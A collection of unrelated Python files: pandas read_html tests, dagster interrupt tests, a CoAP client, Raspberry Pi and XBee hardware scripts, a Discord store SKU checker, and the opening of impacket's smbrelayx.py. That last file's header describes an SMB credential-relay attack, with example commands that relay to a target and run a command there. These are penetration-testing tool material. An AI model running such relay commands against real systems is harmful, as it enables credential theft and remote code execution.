data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
        # force import check by reinitialising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
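# ---------------------------------------------------------------------------
# Minimal stand-alone sketch (added for illustration, not part of the pandas
# test suite): read_html parses every <table> in the input into a list of
# DataFrames. The inline HTML below is a made-up example, not a test fixture,
# and running it requires one of the optional parsers (lxml, or bs4+html5lib).
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    sample = (
        "<table>"
        "<tr><th>A</th><th>B</th></tr>"
        "<tr><td>1</td><td>2</td></tr>"
        "</table>"
    )
    frames = read_html(sample)
    print(len(frames))   # 1 table found
    print(frames[0])     # DataFrame with columns A and B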
|
myLed.py
|
import threading
import gpiozero
import myUtil
import time
import random
import mySerial
from myLog import log, elog, slog
HIGH = 1 # we can't use anything lower or a clear flickering will show. We can't use PiGPIO (which supports HW PWM), because it will interfere with the Amp.
LOW = 0.5
OFF = 0
def getValue():
myDict = mySerial.getDict()
    if not myDict or "On" not in myDict or myDict["On"] != 1:
        return OFF
    tuneFactor = mySerial.getTuneFactor()
    if tuneFactor is None:
return LOW
elif tuneFactor > 0.99:
# radio is perfectly tuned
return HIGH
elif tuneFactor < 0.01:
# radio is totally out of tune
return LOW
else:
# radio is badly tuned: make the LED flicker
oddity = tuneFactor*0.65 + 0.1
if random.random() <= oddity:
return HIGH
else:
return LOW
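# Note (added for clarity): getValue() maps the radio state reported over serial
# to a PWM duty cycle: OFF while the set is switched off, LOW when no tuning
# information is available or the radio is far off-station, HIGH when perfectly
# tuned, and a random mix of HIGH/LOW in between (oddity = tuneFactor*0.65 + 0.1,
# i.e. roughly an 11%..74% chance of a bright frame), which makes the LED flicker
# while a station is being tuned in.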
lastValues = []
def thread_run():
global lastValues
while True:
value = getValue()
# keep track of last values to give the feel that the light is actually a coil-based light.
lastValues = lastValues[0:3]
lastValues.insert(0, value)
value = sum(lastValues) / len(lastValues)
value *= value # adapt for non-linear dim of LEDs
led.value = value
time.sleep(1 / 25)
try:
led = gpiozero.PWMLED(myUtil.ledPin)
thread = threading.Thread(target=thread_run, daemon=True)
thread.name = "led"
thread.start()
except gpiozero.exc.BadPinFactory as e:
elog("LED GPIO could not be initialized. You are probably not running on a RasPi, so we disable the LED feature.")
|
test_interrupt.py
|
import os
import signal
import tempfile
import time
from threading import Thread
import pytest
from dagster import (
DagsterEventType,
Field,
ModeDefinition,
String,
execute_pipeline_iterator,
pipeline,
reconstructable,
resource,
seven,
solid,
)
from dagster.core.errors import DagsterExecutionInterruptedError, raise_execution_interrupts
from dagster.core.test_utils import instance_for_test_tempdir
from dagster.utils import safe_tempfile_path, send_interrupt
from dagster.utils.interrupts import capture_interrupts, check_captured_interrupt
def _send_kbd_int(temp_files):
while not all([os.path.exists(temp_file) for temp_file in temp_files]):
time.sleep(0.1)
send_interrupt()
@solid(config_schema={"tempfile": Field(String)})
def write_a_file(context):
with open(context.solid_config["tempfile"], "w") as ff:
ff.write("yup")
start_time = time.time()
while (time.time() - start_time) < 30:
time.sleep(0.1)
raise Exception("Timed out")
@solid
def should_not_start(_context):
assert False
@pipeline
def write_files_pipeline():
write_a_file.alias("write_1")()
write_a_file.alias("write_2")()
write_a_file.alias("write_3")()
write_a_file.alias("write_4")()
should_not_start.alias("x_should_not_start")()
should_not_start.alias("y_should_not_start")()
should_not_start.alias("z_should_not_start")()
def test_single_proc_interrupt():
@pipeline
def write_a_file_pipeline():
write_a_file()
with safe_tempfile_path() as success_tempfile:
# launch a thread the waits until the file is written to launch an interrupt
Thread(target=_send_kbd_int, args=([success_tempfile],)).start()
result_types = []
result_messages = []
# next time the launched thread wakes up it will send a keyboard
# interrupt
for result in execute_pipeline_iterator(
write_a_file_pipeline,
run_config={"solids": {"write_a_file": {"config": {"tempfile": success_tempfile}}}},
):
result_types.append(result.event_type)
result_messages.append(result.message)
assert DagsterEventType.STEP_FAILURE in result_types
assert DagsterEventType.PIPELINE_FAILURE in result_types
assert any(
[
"Execution was interrupted unexpectedly. "
"No user initiated termination request was found, treating as failure." in message
for message in result_messages
]
)
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_interrupt_multiproc():
with tempfile.TemporaryDirectory() as tempdir:
with instance_for_test_tempdir(tempdir) as instance:
file_1 = os.path.join(tempdir, "file_1")
file_2 = os.path.join(tempdir, "file_2")
file_3 = os.path.join(tempdir, "file_3")
file_4 = os.path.join(tempdir, "file_4")
# launch a thread that waits until the file is written to launch an interrupt
Thread(target=_send_kbd_int, args=([file_1, file_2, file_3, file_4],)).start()
results = []
# launch a pipeline that writes a file and loops infinitely
# next time the launched thread wakes up it will send a keyboard
# interrupt
for result in execute_pipeline_iterator(
reconstructable(write_files_pipeline),
run_config={
"solids": {
"write_1": {"config": {"tempfile": file_1}},
"write_2": {"config": {"tempfile": file_2}},
"write_3": {"config": {"tempfile": file_3}},
"write_4": {"config": {"tempfile": file_4}},
},
"execution": {"multiprocess": {"config": {"max_concurrent": 4}}},
"intermediate_storage": {"filesystem": {}},
},
instance=instance,
):
results.append(result)
assert [result.event_type for result in results].count(
DagsterEventType.STEP_FAILURE
) == 4
assert DagsterEventType.PIPELINE_FAILURE in [result.event_type for result in results]
def test_interrupt_resource_teardown():
called = []
cleaned = []
@resource
def resource_a(_):
try:
called.append("A")
yield "A"
finally:
cleaned.append("A")
@solid(config_schema={"tempfile": Field(String)}, required_resource_keys={"a"})
def write_a_file_resource_solid(context):
with open(context.solid_config["tempfile"], "w") as ff:
ff.write("yup")
while True:
time.sleep(0.1)
@pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
def write_a_file_pipeline():
write_a_file_resource_solid()
with safe_tempfile_path() as success_tempfile:
# launch a thread the waits until the file is written to launch an interrupt
Thread(target=_send_kbd_int, args=([success_tempfile],)).start()
results = []
# launch a pipeline that writes a file and loops infinitely
# next time the launched thread wakes up it will send an interrupt
for result in execute_pipeline_iterator(
write_a_file_pipeline,
run_config={
"solids": {
"write_a_file_resource_solid": {"config": {"tempfile": success_tempfile}}
}
},
):
results.append(result.event_type)
assert DagsterEventType.STEP_FAILURE in results
assert DagsterEventType.PIPELINE_FAILURE in results
assert "A" in cleaned
def _send_interrupt_to_self():
os.kill(os.getpid(), signal.SIGINT)
start_time = time.time()
while not check_captured_interrupt():
time.sleep(1)
if time.time() - start_time > 15:
raise Exception("Timed out waiting for interrupt to be received")
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_capture_interrupt():
outer_interrupt = False
inner_interrupt = False
with capture_interrupts():
try:
_send_interrupt_to_self()
except: # pylint: disable=bare-except
inner_interrupt = True
assert not inner_interrupt
# Verify standard interrupt handler is restored
standard_interrupt = False
try:
_send_interrupt_to_self()
except KeyboardInterrupt:
standard_interrupt = True
assert standard_interrupt
outer_interrupt = False
inner_interrupt = False
# No exception if no signal thrown
try:
with capture_interrupts():
try:
time.sleep(5)
except: # pylint: disable=bare-except
inner_interrupt = True
except: # pylint: disable=bare-except
outer_interrupt = True
assert not outer_interrupt
assert not inner_interrupt
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_raise_execution_interrupts():
    standard_interrupt = False
    with raise_execution_interrupts():
try:
_send_interrupt_to_self()
except DagsterExecutionInterruptedError:
standard_interrupt = True
assert standard_interrupt
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_interrupt_inside_nested_delay_and_raise():
interrupt_inside_nested_raise = False
interrupt_after_delay = False
try:
with capture_interrupts():
with raise_execution_interrupts():
try:
_send_interrupt_to_self()
except DagsterExecutionInterruptedError:
interrupt_inside_nested_raise = True
except: # pylint: disable=bare-except
interrupt_after_delay = True
assert interrupt_inside_nested_raise
assert not interrupt_after_delay
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_no_interrupt_after_nested_delay_and_raise():
interrupt_inside_nested_raise = False
interrupt_after_delay = False
try:
with capture_interrupts():
with raise_execution_interrupts():
try:
time.sleep(5)
except: # pylint: disable=bare-except
interrupt_inside_nested_raise = True
_send_interrupt_to_self()
except: # pylint: disable=bare-except
interrupt_after_delay = True
assert not interrupt_inside_nested_raise
assert not interrupt_after_delay
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_calling_raise_execution_interrupts_also_raises_any_captured_interrupts():
interrupt_from_raise_execution_interrupts = False
interrupt_after_delay = False
try:
with capture_interrupts():
_send_interrupt_to_self()
try:
with raise_execution_interrupts():
pass
except DagsterExecutionInterruptedError:
interrupt_from_raise_execution_interrupts = True
except: # pylint: disable=bare-except
interrupt_after_delay = True
assert interrupt_from_raise_execution_interrupts
assert not interrupt_after_delay
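# ---------------------------------------------------------------------------
# Minimal stand-alone sketch (added for illustration, not part of the test
# suite): the pattern exercised above wraps a work loop in capture_interrupts()
# so a SIGINT is recorded instead of raised, and the loop polls
# check_captured_interrupt() to shut down cleanly. The loop body below is a
# placeholder, not real Dagster work.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    with capture_interrupts():
        for _ in range(50):
            if check_captured_interrupt():
                print("interrupt captured, exiting work loop cleanly")
                break
            time.sleep(0.1)  # stand-in for a unit of real work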
|
helperclient.py
|
import random
from multiprocessing import Queue
from queue import Empty
import threading
from coapthon.messages.message import Message
from coapthon import defines
from coapthon.client.coap import CoAP
from coapthon.messages.request import Request
from coapthon.utils import generate_random_token
import socket
__author__ = 'Giacomo Tanganelli'
class HelperClient(object):
"""
Helper Client class to perform requests to remote servers in a simplified way.
"""
def __init__(self, server, sock=None, cb_ignore_read_exception=None, cb_ignore_write_exception=None):
"""
Initialize a client to perform request to a server.
:param server: the remote CoAP server
:param sock: if a socket has been created externally, it can be used directly
:param cb_ignore_read_exception: Callback function to handle exception raised during the socket read operation
:param cb_ignore_write_exception: Callback function to handle exception raised during the socket write operation
"""
#self.server = server
        # bug fix: if the host is a domain name, resolve it to an IP address first
server_ip = socket.getaddrinfo(server[0], None)[0][4][0]
if server_ip == server[0]:
self.server = server
else:
self.server = (server_ip, server[1])
port = random.randint(1, 65535)
print(" using port: ", port)
self.protocol = CoAP(self.server, port, self._wait_response, sock=sock,
cb_ignore_read_exception=cb_ignore_read_exception, cb_ignore_write_exception=cb_ignore_write_exception)
self.queue = Queue()
def _wait_response(self, message):
"""
Private function to get responses from the server.
:param message: the received message
"""
if message is None or message.code != defines.Codes.CONTINUE.number:
self.queue.put(message)
def stop(self):
"""
Stop the client.
"""
self.protocol.close()
self.queue.put(None)
def close(self):
"""
Close the client.
"""
self.stop()
def _thread_body(self, request, callback):
"""
Private function. Send a request, wait for response and call the callback function.
:param request: the request to send
:param callback: the callback function
"""
self.protocol.send_message(request)
while not self.protocol.stopped.isSet():
response = self.queue.get(block=True)
callback(response)
def cancel_observing(self, response, send_rst): # pragma: no cover
"""
Delete observing on the remote server.
:param response: the last received response
:param send_rst: if explicitly send RST message
:type send_rst: bool
"""
if send_rst:
message = Message()
message.destination = self.server
message.code = defines.Codes.EMPTY.number
message.type = defines.Types["RST"]
message.token = response.token
message.mid = response.mid
self.protocol.send_message(message)
self.stop()
def get(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a GET on a certain path.
:param path: the path
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.GET, path)
# request.token = generate_random_token(2)
request.token = generate_random_token(4)
for k, v in kwargs.items():
#print ("get", k,v)
if hasattr(request, k):
#print ("get : setting:", k,v)
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def get_non(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a GET on a certain path.
:param path: the path
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request_non(defines.Codes.GET, path)
#request.token = generate_random_token(2)
for k, v in kwargs.items():
#print ("get_none", k,v)
if hasattr(request, k):
#print ("get_none", k,v)
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def observe(self, path, callback, timeout=None, **kwargs): # pragma: no cover
"""
Perform a GET with observe on a certain path.
:param path: the path
:param callback: the callback function to invoke upon notifications
:param timeout: the timeout of the request
:return: the response to the observe request
"""
request = self.mk_request(defines.Codes.GET, path)
request.observe = 0
for k, v in kwargs.items():
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def delete(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a DELETE on a certain path.
:param path: the path
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.DELETE, path)
for k, v in kwargs.items():
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def post(self, path, payload, callback=None, timeout=None, no_response=False, **kwargs): # pragma: no cover
"""
Perform a POST on a certain path.
:param path: the path
:param payload: the request payload
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.POST, path)
request.token = generate_random_token(2)
request.payload = payload
if no_response:
request.add_no_response()
request.type = defines.Types["NON"]
for k, v in kwargs.items():
            print("post : trying:", k, v)
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout, no_response=no_response)
def put(self, path, payload, callback=None, timeout=None, no_response=False, **kwargs): # pragma: no cover
"""
Perform a PUT on a certain path.
:param path: the path
:param payload: the request payload
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.PUT, path)
request.token = generate_random_token(4)
request.payload = payload
if no_response:
request.add_no_response()
request.type = defines.Types["NON"]
for k, v in kwargs.items():
#print ("put : trying :", k,v)
if hasattr(request, k):
#print ("put : setting:", k,v)
setattr(request, k, v)
return self.send_request(request, callback, timeout, no_response=no_response)
def discover(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a Discover request on the server.
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
        if path is None:
request = self.mk_request_non(defines.Codes.GET, "/oic/res")
else:
request = self.mk_request_non(defines.Codes.GET, path)
#print("discover: path:", path)
# request.token = generate_random_token(2)
request.token = generate_random_token(4)
print ("discover : path=", path)
print ("discover : token=", request.token)
for k, v in kwargs.items():
#print ("discover : has:", k,v)
if hasattr(request, k):
try:
#print ("discover : setting:", k,v)
setattr(request, k, v)
except:
pass
return self.send_request(request, callback, timeout)
def send_request(self, request, callback=None, timeout=None, no_response=False): # pragma: no cover
"""
Send a request to the remote server.
:param request: the request to send
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
if callback is not None:
thread = threading.Thread(target=self._thread_body, args=(request, callback))
thread.start()
else:
self.protocol.send_message(request)
if no_response:
return
try:
response = self.queue.get(block=True, timeout=timeout)
except Empty:
#if timeout is set
response = None
return response
def send_empty(self, empty): # pragma: no cover
"""
Send empty message.
:param empty: the empty message
"""
self.protocol.send_message(empty)
def mk_request(self, method, path):
"""
Create a request.
:param method: the CoAP method
:param path: the path of the request
:return: the request
"""
request = Request()
request.destination = self.server
request.code = method.number
request.uri_path = path
return request
def mk_request_non(self, method, path):
"""
Create a request.
:param method: the CoAP method
:param path: the path of the request
:return: the request
"""
request = Request()
request.destination = self.server
request.code = method.number
request.uri_path = path
request.type = defines.Types["NON"]
return request
# feature update : ping
def ping(self):
"""
send a CON empty message to server to trigger RST response (CoAP ping)
"""
empty = Request()
empty.destination = self.server
        empty.type = 0  # type 0 == CON (confirmable); the server answers an empty CON with RST
self.send_empty(empty)
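# ---------------------------------------------------------------------------
# Minimal usage sketch (added for illustration; the address and resource path
# below are placeholders, not part of the original module). HelperClient.get()
# blocks until a response arrives or the timeout expires, returning None on
# timeout.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    client = HelperClient(server=("127.0.0.1", 5683))  # assumes a local CoAP server
    try:
        response = client.get("/oic/res", timeout=5)
        print(response if response is not None else "no response within timeout")
    finally:
        client.stop()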
|
info_controller.py
|
import threading
import time
from tkinter.constants import *
from pyphone import controllers
from pyphone.controllers.controller import Controller
class InfoController(Controller):
def __init__(self, panel):
super().__init__(panel)
self._update_thread = threading.Thread(target=self._update_worker, daemon=True)
self._update_thread.start()
def cleanup(self):
super().cleanup()
self._update_thread.join()
def _update_worker(self):
from pyphone.controllers import GammuController
while not self.stopped.isSet():
if self.panel_visible and controllers.get(GammuController).connected.isSet():
self._get_system_info()
self._get_connection_info()
self._get_battery_status()
time.sleep(5)
def _get_system_info(self):
from pyphone.controllers import GammuController
system_info = []
system_info_commands = [
"GetManufacturer",
"GetModel",
"GetFirmware",
"GetNetworkInfo",
"GetSecurityStatus",
"GetDisplayStatus",
"GetSMSStatus",
"GetCalendarStatus",
"GetFileSystemStatus",
"GetIMEI",
"GetOriginalIMEI",
"GetSIMIMSI",
"GetPPM"
]
def add_system_info(name, result, error, percents):
system_info.append((name, result if error is None else error))
for command in system_info_commands:
controllers.get(GammuController).enqueue_command(command, callback=add_system_info)
while len(system_info) < len(system_info_commands):
if self.stopped.wait(0.1):
return
for entry in self.panel.system_info_tree.get_children():
self.panel.system_info_tree.delete(entry)
for entry in system_info:
key = entry[0]
value = entry[1] if entry[1] is not None else ""
self.panel.system_info_tree.insert("", END, text=key, values=(value,))
def _get_connection_info(self):
from pyphone.controllers import GammuController
def set_connection_info(name, result, error, percents):
if not self.stopped.isSet():
signal_percent = int(result["SignalPercent"]) if error is None else 0
signal_strength = int(result["SignalStrength"]) if error is None else 0
self.panel.signal_status_bar.configure(value=signal_percent)
self.panel.signal_status_text.configure(text="{} dBm".format(signal_strength))
controllers.get(GammuController).enqueue_command("GetSignalQuality", callback=set_connection_info)
return
def _get_battery_status(self):
from pyphone.controllers import GammuController
def set_battery_status(name, result, error, percents):
if not self.stopped.isSet():
battery_percent = int(result["BatteryPercent"]) if error is None else 0
self.panel.battery_status_bar.configure(value=battery_percent)
self.panel.battery_status_text.configure(text="{} %".format(battery_percent))
controllers.get(GammuController).enqueue_command("GetBatteryCharge", callback=set_battery_status)
|
main.pyw
|
from threading import Thread, Event
from queue import Queue
from tkinter import Tk, ttk
from time import sleep as wait
from loggingFramework import Logger
import requests
import json
import sys
logger = Logger()
def handle_exception(etype, value, traceback):
logger.logException(value)
quit()
sys.excepthook = handle_exception
skuKey = "primary_sku_id"
logger.logInfo("Getting games list")
datajson = requests.get("https://discordapp.com/api/v6/applications/detectable").json()
logger.logInfo("Building Interface")
root = Tk()
root.title("Search Discord for games!")
root.geometry('400x250+1000+300')
lb0 = ttk.Label(root, text="{} games to check. Estimated time: {} minutes".format(len(datajson), round((len(datajson) * 1) / 60, 2)))
lb0.pack()
lb1 = ttk.Label(root, text="Checked {} out of {} games".format("0", len(datajson)))
lb1.pack()
lb2 = ttk.Label(root, text="Press Start to begin searching")
lb2.pack()
pb = ttk.Progressbar(root, maximum=len(datajson), mode="determinate")
pb.pack(expand=True)
info_queue = Queue()
info_event = Event()
term_event = Event()
s_term_event = Event()
def start():
logger.logInfo("Starting...")
global updateThread
global searchT
s_term_event.clear()
btn["state"] = "disabled"
root.title("Searching Discord for games...")
updateThread = Thread(target=updateGUI, args=(info_queue, info_event, term_event))
searchT = Thread(target=search, args=(info_queue, info_event, term_event, s_term_event))
updateThread.start()
wait(0.1)
searchT.start()
def cancelSearch():
btn["state"] = "normal"
root.title("Searching Discord for games... Cancelled")
s_term_event.set()
def updateGUI(in_queue, in_event, term_event_in):
logger.logInfo("[Update]: Starting...", True)
while True:
is_set = in_event.wait(10)
if is_set:
try:
lb0text = in_queue.get()
lb1text = in_queue.get()
lb2text = in_queue.get()
pbvalue = in_queue.get()
lb0.config(text = lb0text)
lb1.config(text = lb1text)
lb2.config(text = lb2text)
pb["value"] = pbvalue
in_event.clear()
except Exception as e:
logger.logException(e)
s_term_event.set()
term_event_in.set()
if term_event_in.is_set() is True:
logger.logInfo("[Update]: Terminating...", True)
return
def search(queue_out, event_out, term_event_out, term_event_in):
logger.logInfo("[Search]: Starting...", True)
maxItems = len(datajson)
cItem = 1
workingSKUS = []
SKUCount = 0
queue_out.put("Checked {} out of {} games".format("0", len(datajson)))
queue_out.put("Starting")
queue_out.put("Please wait...")
queue_out.put(0)
event_out.set()
#root.update()
wait(2)
for item in datajson:
try:
while True:
r = requests.get("https://discordapp.com/api/v6/store/published-listings/skus/{}".format(item[skuKey]))
if r.status_code == 404:
break
elif r.status_code == 200:
workingSKUS.append(item)
break
elif r.status_code == 429:
wait(10)
continue
else:
break
SKUCount += 1
except KeyError:
pass
except Exception as e:
logger.logException(e)
cItem += 1
while not queue_out.empty():
pass
queue_out.put("Checked {} out of {} games".format(cItem - 1, len(datajson)))
queue_out.put("Checking {}".format(item["name"]))
queue_out.put("{} SKU IDs have been checked and I've found {} working SKUs so far".format(SKUCount, len(workingSKUS)))
queue_out.put(cItem - 1)
event_out.set()
wait(1)
if term_event_in.is_set():
logger.logInfo("[Search]: Terminating...", True)
term_event_out.set()
return
listString = []
for item in workingSKUS:
listString.append("{} : https://discord.com/store/skus/{}".format(item["name"], item[skuKey]))
logger.logInfo("Writing to file...")
with open("output.txt", "w") as outputfile:
outputfile.write("\n".join(listString))
queue_out.put(lb0["text"])
queue_out.put("Completed! Please check the new output.txt file")
queue_out.put("Found {} working SKUs".format(len(workingSKUS)))
queue_out.put(pb["value"])
event_out.set()
term_event_out.set()
btn = ttk.Button(root, text="Start", command=start)
btn.pack()
cbtn = ttk.Button(root, text="Cancel", command=cancelSearch)
cbtn["state"] = "disabled"
cbtn.pack()
logger.logInfo("Interface built, starting main loop!")
root.mainloop()
|
main.py
|
# Copyright 2020, Digi International Inc.
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from digi.xbee.io import IOLine, IOMode
from digidevice import xbee
import time
import threading
REMOTE_NODE_ID = "REMOTE"
IOLINE_IN = IOLine.DIO1_AD1
def main():
print(" +-------------------------------------+")
print(" | XBee Gateway Read Remote ADC Sample |")
print(" +-------------------------------------+\n")
stop = False
th = None
local_device = xbee.get_device()
try:
local_device.open()
# Obtain the remote XBee device from the XBee network.
xbee_network = local_device.get_network()
remote_device = xbee_network.get_device_by_node_id(REMOTE_NODE_ID)
if not remote_device:
print("Device not found in the network, trying to discover it...")
remote_device = xbee_network.discover_device(REMOTE_NODE_ID)
if remote_device is None:
print("Could not discover the remote device")
exit(1)
remote_device.set_io_configuration(IOLINE_IN, IOMode.ADC)
def read_adc_task():
while not stop:
# Read the analog value from the remote input line.
value = remote_device.get_adc_value(IOLINE_IN)
print("%s: %d" % (IOLINE_IN, value))
time.sleep(0.2)
th = threading.Thread(target=read_adc_task)
time.sleep(0.5)
th.start()
input()
finally:
stop = True
if th:
th.join()
if local_device is not None and local_device.is_open():
local_device.close()
if __name__ == '__main__':
main()
|
smbrelayx.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SMB Relay Module
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc. It receives a list of targets and, for every connection received, it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first try to authenticate against the client connecting
# to us.
#
# It is implemented by invoking an SMB and an HTTP server, hooking into a few
# functions and then using the smbclient portion. It is supposed to
# work on any LM Compatibility level. The only way to stop this attack
# is to enforce SPN checks and/or signing on the server.
#
# If the target system is enforcing signing and a machine account was provided,
# the module will try to gather the SMB session key through
# NETLOGON (CVE-2015-0005).
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set up against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want so the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
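# Illustrative invocations (hypothetical hosts and hashes; the flags are the ones
# defined in the argument parser at the bottom of this file):
#
#   # Relay every incoming connection to a single target and run a command there:
#   ./smbrelayx.py -h 10.0.0.5 -c "whoami /all" -one-shot
#
#   # Provide a machine account so the SMB session key can be obtained via NETLOGON
#   # when the target enforces signing:
#   ./smbrelayx.py -h 10.0.0.5 -machine-account DOMAIN/MACHINE$ \
#       -machine-hashes LMHASH:NTHASH -domain 10.0.0.1
#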
from __future__ import division
from __future__ import print_function
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import http.server
import socketserver
import argparse
import base64
import logging
import os
import sys
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from binascii import unhexlify, hexlify
from struct import pack, unpack
from threading import Thread
from six import PY2
from impacket import version
from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.examples import logger
from impacket.examples import serviceinstall
from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections, SOCKS
from impacket.examples.ntlmrelayx.clients.smbrelayclient import SMBRelayClient
from impacket.nt_errors import ERROR_MESSAGES
